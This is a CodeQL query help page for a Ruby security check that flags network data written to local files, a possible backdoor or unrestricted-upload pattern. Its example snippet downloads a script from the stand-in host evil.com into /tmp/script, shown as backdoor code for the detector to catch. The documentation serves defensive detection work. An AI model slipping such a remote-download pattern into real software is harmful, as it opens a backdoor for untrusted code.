Network data written to file¶
ID: rb/http-to-file-accessKind: path-problemSecurity severity: 6.3Severity: warningPrecision: mediumTags: - security - external/cwe/cwe-912 - external/cwe/cwe-434Query suites: - ruby-security-extended.qls - ruby-security-and-quality.qls
Click to see the query in the CodeQL repository
Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.
Recommendation¶
Examine the highlighted code closely to ensure that it is behaving as intended.
Example¶
The following example shows backdoor code that downloads data from the URLhttps://evil.com/script, and stores it in the local file/tmp/script.
require"net/http"resp=Net::HTTP.new("evil.com").get("/script").bodyfile=File.open("/tmp/script","w")file.write(body)
Other parts of the program might then assume that since/tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.
References¶
OWASP:Trojan Horse.
OWASP:Unrestricted File Upload.
Common Weakness Enumeration:CWE-912.
Common Weakness Enumeration:CWE-434.